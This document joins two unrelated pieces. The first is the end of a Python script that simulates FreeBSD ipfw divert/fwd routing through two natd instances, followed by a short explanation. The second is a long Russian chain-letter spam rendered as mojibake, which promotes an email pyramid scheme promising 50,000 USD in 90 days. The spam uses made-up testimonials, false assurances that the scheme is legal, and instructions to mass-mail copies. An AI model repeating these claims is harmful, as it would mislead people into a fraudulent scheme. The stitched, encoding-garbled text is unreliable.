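    """One simplified ipfw rule: number, action, argument, match fields."""
    return {"num": num, "action": action, "arg": arg,
            "src": src, "dst": dst, "dir": direction}


def matches(spec, addr):
    """True if addr falls inside the rule's address spec ('any' or CIDR)."""
    return spec == "any" or ipaddress.ip_address(addr) in ipaddress.ip_network(spec)


# Clark's ruleset, with ${oip1}/${oip2} replaced by the sample addresses.
CLARK = [
    rule(500, "divert", 8668, "10.10.10.0/25"),
    rule(600, "divert", 8669, "10.10.10.128/25"),
    rule(700, "divert", 8668, "any", OIP1 + "/32", "in"),
    rule(800, "divert", 8669, "any", OIP2 + "/32", "in"),
    rule(1000, "fwd", "2.2.2.1", OIP1 + "/32"),
    rule(2000, "fwd", "2.2.2.2", OIP2 + "/32"),
]

# Reimer's two fwd rules followed by one natd divert rule. The divert rule's
# number (3000) is an assumption; the point is only that it comes later.
FWD_FIRST = [
    rule(1000, "fwd", "2.2.2.1", "10.10.10.0/25", direction="any"),
    rule(2000, "fwd", "2.2.2.2", "10.10.10.128/25", direction="any"),
    rule(3000, "divert", 8668, "any", direction="any"),
]


def route_outbound(rules, src, dst="198.51.100.7"):
    """Walk an outbound packet through the rules.

    Returns (source address on the wire, next hop, rule numbers matched).
    """
    pkt = {"src": src, "dst": dst}
    trace = []
    resume_after = 0            # rule number the search resumes after
    ordered = sorted(rules, key=lambda r: r["num"])
    while True:
        for r in ordered:
            if r["num"] <= resume_after or r["dir"] not in ("out", "any"):
                continue
            if not (matches(r["src"], pkt["src"]) and matches(r["dst"], pkt["dst"])):
                continue
            trace.append(r["num"])
            if r["action"] == "fwd":
                # fwd sets the next hop and terminates the search
                return pkt["src"], r["arg"], trace
            if r["action"] == "divert":
                # natd rewrites the source to its alias address and re-injects;
                # the search continues with the rules after this one
                pkt["src"] = NATD[r["arg"]]
                resume_after = r["num"]
                break
        else:
            # no rule ended the search: normal routing applies
            return pkt["src"], "default route", trace


if __name__ == "__main__":
    for name, rs in (("two natd + fwd", CLARK), ("fwd first", FWD_FIRST)):
        for host in ("10.10.10.5", "10.10.10.200"):
            print(name, host, route_outbound(rs, host))
```

With the fwd rules first, the packet leaves toward the right gateway but still carries its private 10.10.10.x source, which is the failure Clark describes. The /25 split also sends 10.10.10.128 to gateway 2, while the original request listed .128 with the first group.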

ÎÒÏÅ×ÀÒÀÉÒÅ ÝÒÎ, ÏÎÆÀËÓÉÑÒÀ, È ÑÏÎÊÎÉÍÎ ÏÐÎ×ÈÒÀÉÒÅ !

ÂÛ ÇÀÐÀÁÎÒÀÅÒÅ ÌÍÎÃÎ ÄÅÍÅÃ!

ÝÒÎÒ ÁÈÇÍÅÑ ÐÀÁÎÒÀÅÒ ÏÐÎÑÒÎ ÂÅËÈÊÎËÅÏÍÎ!!!

ß ÐÀÁÎÒÀÞ ÏÎ ÝÒÎÉ ÏÐÎÃÐÀÌÌÅ ÎÄÈÍ - ÄÂÀ ×ÀÑÀ  ÄÅÍÜ, ÂÊËÞ×Àß ÎÁÐÀÁÎÒÊÓ ÇÀÊÀÇÎÂ È ÄÎÐÎÃÓ Â ÁÀÍÊ!!!

Íà÷íèòå ðàáîòàòü ñ íàìè è óâèäèòå, ÷òî áóäåòå ðàäû òîìó, ÷òî òàê ñäåëàëè!!!

ÇÀÐÀÁÎÒÀÉÒÅ 100.000,- USD ÇÀ ÃÎÄ ÍÀ ÐÅÊËÀÌÅ Â ÈÍÒÅÐÍÅÒÅ È ÐÀÑÑÛËÊÅ E-MAIL!!!

Óâàæàåìûå äðóçüÿ è ïîäðóãè,

Âû ìîæåòå çàðàáîòàòü 50.000,- USD è áîëüøå â òå÷åíèå ñëåäóþùèõ 90 äíåé íà ðàññûëêå e-mail. ÊÀÆÅÒÑß ÍÅÂÎÇÌÎÆÍÛÌ?? Ïðî÷èòàéòå äåòàëè, â ýòîì íåò íèêàêîé êàâåðçû èëè îáìàíà, ïðîñòî äåëàéòå ñåáå ðåêëàìó â Èíòåðíåò, ðàññûëàéòå e-mail è ðàçìåùàéòå ðåêëàìíûå îáúÿâëåíèÿ, è ÂÛ âñòàíåòå íà ïóòü ê ôèíàíñîâîé íåçàâèñèìîñòè è ÑÂÎÁÎÄÅ!!

"AS SEEN ON NATIONAL TELEVISION"

Ñïàñèáî çà Âàøå âðåìÿ è èíòåðåñ. Îá ýòîì ïèñüìå íåäàâíî áûëî íàïèñàíî â àìåðèêàíñêèõ ãàçåòàõ. Òàêæå, ââèäó åãî ïîïóëÿðíîñòè â Èíòåðíåòå, ãëàâíàÿ íî÷íàÿ èíôîðìàöèîííàÿ ïðîãðàììà ïîñâåòèëà åìó öåëóþ ïåðåäà÷ó íà îáúÿñíåíèå è âûÿñíåíèå, äåéñòâèòåëüíî ëè íèæå îïèñàííàÿ ïðîãðàììà ìîæåò ïðèíåñòè ëþäÿì äåíüãè. Òàêæå ïðîâåäåíî èññëåäîâàíèå ëåãàëüíîñòè äàííîé ïðîãðàììû.  ðåçóëüòàòå êîòîðîãî, ðàç è íàâñåãäà ïîäòâåðäèëîñü, ÷òî íå íàðóøàþòñÿ íèêàêèå çàêîíû è ïîñòàíîâëåíèÿ. Ýòî ïîìîãëî ïîêàçàòü ëþäÿì, ÷òî ýòî ïðîñòîé, áåçâðåäíûé è èíòåðåñíûé ñïîñîá çàðàáîòêà äåíåã íà äîìó. Âû ïîéìåòå ñóòü, êàê òîëüêî ïðî÷èòàåòå ýòî ðóêîâîäñòâî.

 

 

Íàïå÷àòàéòå ýòîò äîêóìåíò ñåé÷àñ, äëÿ ïîñëåäóþùåãî ÷òåíèÿ.

(Èíôîðìàöèÿ òðåáóåò âíèìàòåëüíîãî ïðî÷òåíèÿ)

Ñëåäóþùàÿ âîçìîæíîñòü, ïðèíîñèò äîõîä , è ìîæåò Âàñ çàèíòåðåñîâàòü.

Åñòü âîçìîæíîñòü åå íà÷àòü ñ ìèíèìàëüíûìè èíâåñòèöèÿìè, à äîõîä ïðîñòî ÏÎÐÀÇÈÒÅËÜÍÛÉ!!!!!

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Õîòèòå çàðàáîòàòü 50.000,- USD ìåíüøå ÷åì çà 90 äíåé!? Ïîæàëóéñòà, ïðî÷èòàéòå äàííóþ ïðîãðàììó, ñíà÷àëà ÿ ýòîìó òîæå íå âåðèë, îäíàêî ýòî òàê!!!

À ïîòîì ïðî÷èòàéòå ýòî ÅÙÅ ÐÀÇ!

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

ÝÒÎ ËÅÃÀËÜÍÀß ÂÎÇÌÎÆÍÎÑÒÜ ÇÀÐÀÁÎÒÀÒÜ ÄÅÍÜÃÈ !!! !!!

Ýòî íå òðåáóåò, ÷òîáû âû âñòðå÷àëèñü ñ ëþäüìè (êàê âî ìíîãèõ äðóãèõ ïîäîáíûõ ïðåäëîæåíèÿõ)!!! Ìîæåòå ðàáîòàòü ñâîèì òåìïîì. Ñàìîå ëó÷øåå ýòî òî, ÷òî íåò íåîáõîäèìîñòè ïîêèäàòü ñâîé äîì. Åñëè âû âåðèòå, ÷òî êîãäà-íèáóäü, â îäèí ïðåêðàñíûé äåíü, ó Âàñ ïîÿâèòüñÿ âîçìîæíîñòü äîëãî îòäûõàòü, òàê ýòo, èìåííî, è åñòü òàêàÿ ÂÎÇÌÎÆÍÎÑÒÜ!!!!!

Ïðîñòî, ñëåäóéòå äàííîé èíñòðóêöèè, è Âàø ñîí èñïîëíèòñÿ. Ýòîò áèçíåñ - Multi-level-E-MAIL òîðãîâëÿ ïî çàêàçàì, ïðîãðàììà äåéñòâóåò ïðåâîñõîäíî íà 100% è êîãäà è ãäå óãîäíî. E-mail ÿâëÿåòñÿ òîðãîâûì èíñòðóìåíòîì áóäóùåãî!!! Èñïîëüçóéòå ýòîò íåêîììåð÷åñêèé ìåòîä ðåêëàìû. Ñäåëàéòå ýòî ñåé÷àñ!!! ×åì äîëüøå áóäåòå æäàòü, òåì áîëüøå ëþäåé áóäåò äåëàòü ýòîò áèçíåññ. Âîçüìèòå ñåáå ÷àñòü ÝÒÎÉ ÀÊÖÈÈ!! MULTI-LEVEL-MARKETING (MLM) íàêîíåö-òî äîñòèã óâàæåíèÿ. Îí ïðåïîäàåòñÿ â Ãàðâàðäñêîé òîðãîâîé øêîëå. Ñòýíôîðäñêèé èññëåäîâàòåëüñêèé èíñòèòóò è æóðíàë Wall Street çàÿâèëè, ÷òî 50-65% âñåõ òîâàðîâ è óñëóã äî êîíöà òûñÿ÷åëåòèÿ áóäóò ïðîäàâàòüñÿ ïîñðåäñòâîì multi-level ìåòîäîâ. Ýòî ìíîãî ìèëëèàðäíàÿ äîëëàðîâàÿ èíäóñòðèÿ, è òîëüêî èç 500,000 ìèëëèîíåðîâ â ÑØÀ, öåëûõ 20% (100.000 ÷åëîâåê) ñäåëàëè ñâîå ñîñòîÿíèå çà ïîñëåäíèå ïàðó ëåò áëàãîäàðÿ MLM. À åùå, ñòàòèñòèêà ïîêàçûâàåò, ÷òî 45 ÷åëîâåê êàæäûé äåíü ñòàíîâÿòñÿ ìèëëèîíåðàìè áëàãîäàðÿ Multi-Level-Marketing. Âîçìîæíî, ÷òî âû óæå ñëûøàëè èñòîðèþ, êàê Äîíàëüä Òðàìï ëåòîì íàâåñòèë øîó Äåâèäà Ëåòòåðìàíà. Äåâèä ñïðîñèë åãî, ÷òîáû îí äåëàë åñëè áû ïîòåðÿë âñå ñâîå ñîñòîÿíèå è âûíóæäåí áûë íà÷àòü âñå ñ íà÷àëà. Äîíàëüä áåç êîëåáàíèÿ îòâåòèë, ÷òî íàøåë áû õîðîøóþ MLM ôèðìó è íà÷àë ðàáîòàòü. Ïóáëèêà íà÷àëà ñâèñòåòü âûðàæàÿ íåñîãëàñèå. Äîíàëüä ïîñìîòðåë íà çðèòåëüíûé çàë è ñåðüåçíî ïðîèçíåñ: "Áëàãîäàðÿ ýòîìó ÿ çäåñü íàâåðõó, à âû òàì, âíèçó!"

Ñ ñåòåâûì ìàðêåòèíãîì âû èìååòå äâà èñòî÷íèêà ïðèáûëè: Ïðÿìàÿ ïðèáûëü ñ ïðîäàæè, êîòîðóþ ïðîâîäèòå Âû ñàìè è ïðèáûëü ñ îáîðîòà ëþäåé, êîòîðûõ ïðèâåäåòå â áèçíåñ. Áåñêîíå÷íàÿ ïðèáûëü ÿâëÿåòñÿ òàéíîé áîãàòñòâà. Ýòî çíà÷èò îäèí ðàç èíâåñòèðîâàòü âðåìÿ èëè äåíüãè à ïîòîì ïîëó÷àòü äåíüãè ñíîâà è ñíîâà.  ñåòåâîì ìàðêåòèíãå ýòî òàêæå îçíà÷àåò ïîëó÷àòü äåíüãè çà ðàáîòó äðóãèõ.

Ê ñîæàëåíèþ, ïðî÷èòàâ ýòî ïèñüìî âïåðâûå, ÿ ïðàêòè÷åñêè ïðîïóñòèë òàêóþ âîçìîæíîñòü ñêâîçü ïàëüöû, è äàæå íå ñòàë ÷èòàòü äàëüøå, íî âñêîðå ÿ ïåðå÷èòàë âñå çàíîâî. Çàäóìàëñÿ è ïîíÿë âñþ ñèëó ýòîãî ïðåäëîæåíèÿ.

È òåïåðü ÿ áîãàò è ñâîáîäåí. ß ìîãó äóõîâíî ðàçâèâàòüñÿ, îòäûõàòü, íàäî ìíîé íåò ãíåòà íà÷àëüñòâà, ìîåé ñåìüå è ìíå íå ìåøàåò óíèçèòåëüíàÿ áåäíîñòü è áîðüáà çà êóñîê õëåáà, ìåøàÿ ÷åëîâå÷åñêîé æèçíè...

************************************************************

Íàïðèìåð, âîò ÷òî ãîâîðèò ìèñòåð Äæåðè Ïðîêòîð, àìåðèêàíñêèé ìèëëèîíåð.

Äâà ãîäà íàçàä áûëà óïðàçäíåíà ìîÿ äîëæíîñòü â ôèðìå, â êîòîðîé ÿ ðàáîòàë ïîñëåäíèõ ïÿòíàäöàòü ëåò. Ïîñëå íåñêîëüêèõ íåóñïåøíûõ ñîáåñåäîâàíèé ÿ ðåøèë íà÷àòü ñâîé ñîáñòâåííûé áèçíåñ.  òå÷åíèè ïðîøëûõ ëåò ÿ ïðîøåë ìíîãî ôèíàíñîâûõ çàòðóäíåíèé. ß áûë äîëæåí ñâîåé ñåìüå, äðóçüÿì è êðåäèòîðàì áîëåå 35.000,- USD. ß áûë âûíóæäåí çàëîæèòü ñâîé äîì, ÷òîáû ïðîêîðìèòü ñâîþ ñåìüþ è óäåðæàòü ñâîé áèçíåñ.  ÝÒÎÒ ÌÎÌÅÍÒ ïðîèçîøëî íå÷òî âûäàþùååñÿ â ìîåé æèçíè, è ÿ ïèøó äëÿ òîãî, ÷òîáû ïîäåëèòüñÿ îá ýòîì çíàìåíàòåëüíîì ñîáûòèè ñ Âàìè.  ñåðåäèíå äåêàáðÿ 1998 ÿ ïîëó÷èë e-mail ñ ýòîé ïðîãðàììîé. Ïåðåä ýòèì ÿ øåñòü ìåñÿöåâ èñêàë ðàçíûå òîðãîâûå âîçìîæíîñòè. Âñå ïðîãðàììû, êîòîðûå ÿ ïîëó÷èë íå áûëè ýôôåêòèâíûìè (ïî êðàéíåé ìåðå íà ìîé âçãëÿä). Îíè áûëè èëè ñëèøêîì ñëîæíûìè èëè òðåáîâàëè áîëüøèõ èíâåñòèöèé, à ðèñêîâàòü ñâîèì âêëàäîì, ÷òîáû óçíàòü äåéñòâóåò ýòî èëè íåò, ÿ íå õîòåë. Êàê ÿ óæå ãîâîðèë, â äåêàáðå 1998 ÿ ïîëó÷èë ýòó ïðîãðàììó. ß íå õîòåë åå ïîëó÷àòü, ïðîñòî, ïîëó÷èë òàê æå êàê è Âû. Ñïàñèáî Áîãó çà ýòî! ß ïðî÷èòàë ïðîãðàììó íåñêîëüêî ðàç, ïîòîìó ÷òî íå ìîã â íåå ïîâåðèòü, è ïðèíÿëñÿ çà ðàáîòó. ß ìîã èíâåñòèðîâàòü òîëüêî ñòîëüêî äåíåã, ñêîëüêî â äàííûé ìîìåíò áûëî âîçìîæíî. Òàê æå êàê è Âû ÿ áûë ñêåïòè÷åí è íåìíîãî áîÿëñÿ î ëåãàëüíîñòè äàííîé ïðîãðàììû. Ïîñëå èñêëþ÷åíèÿ òîãî, ÷òî ïðîãðàììà ìîæåò áûòü íåëåãàëüíîé, ÿ ñêàçàë ñåáå, ïî÷åìó áû ìíå ýòî íå ïîïðîáîâàòü. Ïîòîì ÿ ïîñëàë îêîëî 10.000 e-mail. Ñòîèëî ìíå ýòî îêîëî 15,- USD çà ìîå âðåìÿ on-line. Ïðåâîñõîäíîå ñâîéñòâî e-mail ñîñòîèò â òîì, ÷òî íå íàäî íè÷åãî ïå÷àòàòü, à íóæíî òîëüêî ïîñûëàòü. Òàê êàê âñå çàêàçû îôîðìëÿþòñÿ ÷åðåç e-mail, òî ìîåé èíâåñòèöèåé áûëî òîëüêî ìîå âðåìÿ, êîòîðîå ÿ ïðîâåë ó êîìïüþòåðà. Ãîâîðþ Âàì êàê ýòî áûëî, íàäåþñü, ÷òî Âàñ ýòî íå ðàçî÷àðóåò, òàê êàê ÿ ïîîáåùàë ñåáå, ÷òî íèêîãî íå îáìàíó, ÷åãî áû ìíå ýòî íå ñòîèëî. Ìåíüøå ÷åì ÷åðåç íåäåëþ ÿ íà÷àë ïîëó÷àòü çàêàçû íà REPORT #1. Äî 13 ÿíâàðÿ 1999 ÿ ïîëó÷èë 26 çàêàçîâ íà REPORT #1. 
Âàøåé öåëüþ ÿâëÿåòñÿ ïîëó÷èòü ìèíèìàëüíî 20 çàêàçîâ íà REPORT #1  ÒÅ×ÅÍÈÈ ÄÂÓÕ ÍÅÄÅËÜ. ÅÑËÈ ÂÛ ÈÕ ÍÅ ÏÎËÓ×ÈÒÅ, ÏÎØËÅÒÅ ÁÎËÜØÅ ÄÀÍÍÛÕ ÏÐÎÃÐÀÌÌ, ÄËß ÒÎÃÎ ×ÒÎÁÛ ÈÕ ÏÎËÓ×ÈÒÜ! Ìîé øàã ê ïîëó÷åíèþ 50.000,- USD çà 90 äíåé áûë ñäåëàí. Äî 30 ÿíâàðÿ 1999 ÿ ïîëó÷èë 196 çàêàçîâ íà REPORT #2. Âàøåé öåëüþ ÿâëÿåòñÿ ïîëó÷èòü ìèíèìàëüíî 100 çàêàçîâ íà REPORT #2 â òå÷åíèè äâóõ íåäåëü. Åñëè ýòî íå ïîëó÷èòñÿ, òàê ðàññûëàéòå áîëüøå ýòèõ ïðîãðàìì. Êàê òîëüêî äîñòèãíèòå 100 çàêàçîâ íà REPORT #2 òî âñå îñòàëüíîå áóäåò â ïîðÿäêå è Âû òî÷íî ïîëó÷èòå ñâîè 50.000,- USD. Ó ìåíÿ áûëî 196 çàêàçîâ íà REPORT #2, òî åñòü íà 96 áîëüøå ÷åì ìíå áûëî íóæíî. Ïîýòîìó ÿ ñåë è îòäûõàë. Äî 1 ìàðòà 1999 çà ñâîè 10.000 îòîñëàíûõ e-mail ÿ ïîëó÷èë 58.000,- USD è êàæäûé äåíü ïðèõîäèëè íîâûå äåíüãè. ß çàïëàòèë ñâîè äîëãè è êóïèë ñåáå ìàøèíó. Ïîæàëóéñòà, íàéäèòå âðåìÿ è âíèìàòåëüíî ïðî÷èòàéòå ýòó ïðîãðàììó. ÝÒÎ ÍÀÂÑÅÃÄÀ ÈÇÌÅÍÈÒ ÂÀØÓ ÆÈÇÍÜ!!! Ïîìíèòå, ÷òî ýòî íå çàðàáîòàåò, ïîêà âû ýòî íå ïîïðîáóåòå! Ýòà ïðîãðàììà äåéñòâóåò, íî Âû äîëæíû òî÷íî ïðèäåðæèâàòüñÿ ðåêîìåíäàöèé!!

Ñïåöèàëüíîå ïðàâèëî - íå ñòàðàéòåñü âïèñûâàòü Âàøå èìÿ òàì, ãäå ýòî íå íóæíî. Ýòî íå áóäåò äåéñòâîâàòü, à Âû íåäîïîëó÷èòå ìíîãî äåíåã!! Áîëåå òîãî, ïðè èçìåíåíèè äàííûõ ïðîäàâöîâ èíà÷å, ÷åì ýòî óêàçàíî â èíñòðóêöèè íèæå, äàííûé âèä ïðåäïðèíèìàòåëüñòâà ñòàíîâèòñÿ íåëåãàëüíûì. Ñíîâà ïîâòîðÿþ, ÷òî â ñëó÷àå ñîáëþäåíèÿ âñåõ íèæåóêàçàííûõ ðåêîìåíäàöèé, ðå÷ü èäåò î ëåãàëüíîì ïðåäïðèíèìàòåëüñòâå!! Äëÿ òîãî, ÷òîáû âû äîñòèãëè ñâîåé öåëè íåîáõîäèìî ïîëó÷èòü 20 è áîëüøå çàêàçîâ íà REPORT #1 è 100 è áîëüøå íà REPORT #2.  ýòîì ñëó÷àå çàðàáîòàåòå 50.000,- USD (èëè áîëüøå) çà 90 äíåé! ß - ÐÅÀËÜÍÎÅ ÄÎÊÀÇÀÒÅËÜÑÒÂÎ ÒÎÃÎ, ×ÒÎ ÝÒÎ ÍÀ ÑÀÌÎÌ ÄÅËÅ ÄÅÉÑÒÂÓÅÒ!!! Åñëè âû ðåøèëèñü, ÷òî â ýòîé ïðîãðàììå ó÷àñòâîâàòü íå áóäåòå, òàê ìíå âàñ èñêðåííå æàëü. Òàê êàê ýòî ðåàëüíàÿ ïðåâîñõîäíàÿ âîçìîæíîñòü ñ ìèíèìàëüíûì ðèñêîì è èíâåñòèöèÿìè! Åñëè õîòèòå ó÷àñòâîâàòü, ïðèäåðæèâàéòåñü äàííûõ ðåêîìåíäàöèé è áóäåòå íà äîðîãå ê ôèíàíñîâîé íåçàâèñèìîñòè. Åñëè çàíèìàåòåñü ïðåäïðèíèìàòåëüñòâîì èëè õîòèòå íà÷àòü ñâîé ñîáñòâåííûé áèçíåñ, òàê ñ÷èòàéòå ýòî çà õîðîøóþ âîçìîæíîñòü. ß ÝÒÎ ÑÄÅËÀË !!!

Ñ óâàæåíèåì Äæåðè Ïðîêòîð.

 

 

 

ÝÒÎ ÏÎÐÀÇÈÒÅËÜÍÎ!!!

(ËÈ×ÍÀß ÇÀÌÅÒÊÀ ÎÒ ÎÑÍÎÂÀÒÅËß ÝÒÎÉ ÏÐÎÃÐÀÌÌÛ)

************************************************************

Ïåðåä òåì êàê ïðî÷èòàåòå ýòó ïðîãðàììó, âû äîëæíû ïîíÿòü, ÷òî ýòà ëåãàëüíàÿ ïðîãðàììà íå ìîãëà áûëà áûòü ñîçäàíà ëþáèòåëåì. Ïîçâîëüòå ìíå íåìíîãî ðàññêàçàòü î ñåáå. Öåëûõ 10 ëåò ó ìåíÿ áûë ñîáñòâåííûé ðàçâèâàþùèéñÿ áèçíåñ.  1979 ãîäó ìîé áèçíåñ íà÷àë ðóøèòüñÿ. ß äåëàë âñå, ÷òî ìíå äî ýòîãî ïðèíîñèëî óñïåõ, íî áåçóñïåøíî. Íàêîíåö ÿ ïîíÿë, ÷òî ýòî íå èç-çà ìåíÿ, à èç-çà ýêîíîìèêè, êîòîðàÿ íàñ ñîïðîâîæäàëà ñ 1945 ãîäà. Äóìàþ íå íóæíî Âàì îáúÿñíÿòü, êàê ýòî ïîâëèÿëî íà áåçðàáîòèöó â ñòðàíå, ìíîãèå èç Âàñ ýòî çíàþò ïî ñîáñòâåííîìó îïûòó. Ïðèøëî ìíîãî ïàäåíèé è áàíêðîòîâ. Ñðåäíèé êëàññ èñ÷åçàë, òå, êîòîðûå çíàëè ÷òî äåëàþò, ìóäðî èíâåñòèðîâàëè è ïðîäâèíóëèñü âûøå, à òå êòî íå çíàë, ïàäàëè âñå íèæå, â áåäíîòó. Êàê ãîâîðèò èçâåñòíàÿ ïîãîâîðêà: "ÁÎÃÀÒÛÅ ÁÎÃÀÒÅÞÒ, À ÁÅÄÍÛÅ ÁÅÄÍÅÞÒ". Òðàäèöèîííûå ñïîñîáû çàðàáîòêà äåíåã íèêîãäà íå ïîçâîëÿò Âàì âûñîêî ïîäíÿòüñÿ, à èíôëÿöèÿ òîëüêî ýòîìó ïîìîæåò. Ñåé÷àñ âû ïîëó÷èëè ïèñüìî, êîòîðîå ìîæåò äàòü Âàì ôèíàíñîâóþ íåçàâèñèìîñòü íà âñþ Âàøó æèçíü è "ÁÅÇ ÐÈÑÊÀ" è ñ "ÌÈÍÈÌÀËÜÍÛÌÈ ÓÑÈËÈßÌÈ".  ïîñëåäóþùèõ ìåñÿöàõ Âû ñìîæåòå çàðàáîòàòü äåíåã áîëüøå, ÷åì ìîæåòå ñåáå ïðåäñòàâèòü. Íóæíî ïîä÷åðêíóòü, ÷òî ÿ ñ ýòèõ äåíåã íå óâèæó íè öåíòà. Êàê è íèêòî èç ëþäåé, êîòîðûå òåñòèðîâàëè äàííóþ ïðîãðàììó. ß óæå çàðàáîòàë áîëåå 4.000.000,- USD!!! Ïåðåñòàë èñïîëüçîâàòü ýòó ïðîãðàììó ïîñëå òîãî, êàê ïîñëàë 16.000 ïðîãðàìì. Ñåé÷àñ ó ìåíÿ íåñêîëüêî ôèðì, êîòîðûå èçîáðåòàþò ïîäîáíûå ïðîãðàììû. Âûïîëíÿéòå ïðîãðàììó ÒÎ×ÍÎ ÏÎ ÈÍÑÒÐÓÊÖÈÈ!! Íå èçìåíÿéòå åå íèêàêèì îáðàçîì!! Îíà äåéñòâóåò ìàêñèìàëüíî ýôôåêòèâíî èìåííî â ýòîì âèäå. Íå çàáóäüòå ïîñëàòü êîïèþ ýòîé ïðîãðàììû êàæäîìó, êîãî òîëüêî âñïîìíèòå! Îäèí ÷åëîâåê, êîòîðîìó âû ýòî ïîøëåòå ìîæåò ïîñëàòü è 50.000 êîïèé ... à Âàøå èìÿ áóäåò íà êàæäîé èç íèõ!!! Ïîìíèòå, ÷òî ÷åì áîëüøå ïðîãðàìì âû ïîøëåòå, òåì áîëüøå ïîòåíöèàëüíûõ çàêàç÷èêîâ ïðèîáðåòåòå! Òàê ÷òî, äðóçüÿ, ÿ ïðåäîñòàâëÿþ Âàì âîçìîæíîñòü, èíôîðìàöèþ, ìàòåðèàë äëÿ òîãî ÷òîáû âû ïîëó÷èëè ôèíàíñîâóþ íåçàâèñèìîñòü. ÒÅÏÅÐÜ ÝÒÎ ÇÀÂÈÑÈÒ ÒÎËÜÊÎ ÎÒ ÂÀÑ! 
"ÏÎÄÓÌÀÉÒÅ ÎÁ ÝÒÎÌ" ïåðåä òåì êàê óäàëèòå ýòîò mail, êàê ÷óòü íå ñäåëàë ÿ. Îòâåäèòå ñåáå íåìíîãî âðåìåíè, ïðî÷òèòå è ïî-íàñòîÿùåìó ïîäóìàéòå íàä ýòèì.

Âîçüìèòå ðó÷êó è ïîñ÷èòàéòå, ÷òî ìîæåò èç ýòîãî ïîëó÷èòüñÿ, åñëè Âû ýòî ïîïðîáóåòå. Âîçüìèòå ñàìûé ïëîõîé âàðèàíò, íî è â ýòîì ñëó÷àå ó âàñ áóäåò ìíîãî äåíåã.  ñàìîì õóäøåì ñëó÷àå ïîëó÷èòå ñâîþ èíâåñòèöèþ íàçàä. Âñå ñîìíåíèÿ, êîòîðûå ó âàñ åñòü, èñ÷åçíóò, êîãäà ïîëó÷èòå ñâîé ïåðâûé çàêàç. ÝÒÎ ÄÅÉÑÒÂÓÅÒ!!!!!

Jody Jacobs, Richmond,VA.

À ÒÅÏÅÐÜ, ÂÎÒ ÝÒÀ ÏÅÐÂÎÑÕÎÄÍÀß ÏÐÎÃÐÀÌÌÀ, ÊÎÒÎÐÀß ÂÀÌ ÇÀÐÀÁÎÒÀÅÒ ÒÛÑß×È ÄÎËËÀÐÎÂ!!!!!

************************************************************

ÈÍÑÒÐÓÊÖÈß : Ýòîò ìåòîä çàðàáîòêà äåíåã íà ñàìîì äåëå ÄÅÉÑÒÂÓÅÒ ÍÀ 100%, ÊÎÃÄÀ ÓÃÎÄÍÎ, ÃÄÅ ÓÃÎÄÍÎ. ß óâåðåí, ÷òî Âû ñìîæåòå çàðàáîòàòü áîëåå 50.000,- USD â ïîñëåäóþùèå 90 äíåé. Ïåðåä òåì êàê ñêàçàòü "ãëóïîñòü..." ïîæàëóéñòà ïðî÷èòàéòå âíèìàòåëüíî è âíèêíèòå â ñóòü ýòîé ïðîãðàììû. Ýòî íå öåïíîå ïèñüìî, à îòëè÷íàÿ ëåãàëüíàÿ âîçìîæíîñòü çàðàáîòàòü äåíüãè.  ÷åì ñìûñë? Òàê êàê è â ëþáîé multi-level ñõåìå, òîðãîâëÿ ñòðîèòñÿ íà ïðèâëå÷åíèè íîâûõ ïàðòíåðîâ è ïðîäàæå ñâîèõ òîâàðîâ. ÇÀÊÀÇÛ Ê ÂÀÌ ÏÐÈÕÎÄßÒ È ÂÛÏÎËÍßÞÒÑß ÏÎ E-MAIL, ïîýòîìó íå âîçíèêàåò ëè÷íîãî êîíòàêòà. Äåëàåòñÿ âñå äîìà èëè â ó÷ðåæäåíèè. Ýòî ñàìàÿ áîëüøàÿ multi-level âîçìîæíîñòü íà ñâåòå!!!!! È ÝÒÎ ÍÅ ÏÐÅÓÂÅËÈ×ÅÍÈÅ!!

 

Ñóùåñòâóåò äâà îñíîâíûõ ìåòîäà äëÿ ñòðîèòåëüñòâà âàøèõ íèæíèõ óðîâíåé:

Ìåòîä #1- ÏÎÑÛËÊÀ ÌÀÑÑÎÂÎÉ E-MAIL ÐÅÊËÀÌÛ

Ïðåäïîëîæèì, íàïðèìåð, ÷òî Âû õîòèòå íà÷àòü ñ ìàëîãî êîëè÷åñòâà, òîëüêî äëÿ òîãî, ÷òîáû ïîñìîòðåòü êàê ýòî äåéñòâóåò. Äîïóñòèì, ÷òî Âû è âñå âîâëå÷åííûå Âàìè êîìïàíüîíû ïîøëåòå òîëüêî 2.000 e-mail (êàæäûé èç Âàñ). Òàêæå ïðåäïîëîæèì, ÷òî ïîëó÷èòå âñåãî 0,5% îòâåòîâ. Åñëè èñïîëüçóåòå õîðîøèé ïåðå÷åíü àäðåñîâ òî 1%. Ïîòîì ìíîãî ëþäåé ðàçîøëþò óæå ñîòíè òûñÿ÷ ýòèõ ïðîãðàìì, áëàãîäàðÿ âàøèì 2.000. Ïðîäîëæèì íàø ïðèìåð, âû ïîñëàëè 2.000 ïðîãðàìì. Èç 0,5% îòâåòîâ ýòî òîëüêî 10 çàêàçîâ íà REPORT #1. Ýòèõ äåñÿòü ÷åëîâåê ïîñëàëî 20.000 ïðîãðàìì, ÷òî ïðè 0,5% - óæå 100 çàêàçîâ íà REPORT #2. Êàæäûé èç ýòèõ 100 ïîñëàëè ïî 2.000 ïðîãðàìì, à Âû ïîëó÷èëè 1.000 çàêàçîâ íà REPORT #3, à åñëè êàæäûé èç ýòèõ 1.000 ïîøëåò 2.000 ñâîèõ ïðîãðàìì, òàê ïðè 0,5% ïîëó÷èòå 10.000 çàêàçîâ íà REPORT #4. À ýòî 10.000 õ 5 = 50.000 USD â íàëè÷íîñòè!!!!! Âàø êîíå÷íûé çàðàáîòîê â ýòîì ñëó÷àå áóäåò: 50+500+5.000+50.000 = 55.550,- USD!!!!!!! Ïîìíèòå, ÷òî ýòî ïðåäïîëîæåíèå äëÿ 1990 ÷åëîâåê. Òå, êîòîðûå íå çàõîòÿò ó÷àñòâîâàòü, ýòó âîçìîæíîñòü óäàëÿò, è íè÷åãî íå ñëó÷èòñÿ! Ïîïðîáóéòå ïîäóìàòü ìèíóòêó! À ÷òî åñëè êàæäûé ïîøëåò 100.000 ïðîãðàìì âìåñòî 2.000 ?! Âåðüòå ìíå, ÷òî ëþäè ýòî ñäåëàþò, âîçìîæíî è áîëüøå! Ìåæäó ïðî÷èì, Âàø ôèíàíñîâûé âêëàä ÿâëÿåòñÿ ìèíèìàëüíûì... Âû óæå èìååòå ïîäêëþ÷åíèå ê Èíòåðíåò, à e-mail - áåñïëàòåí!

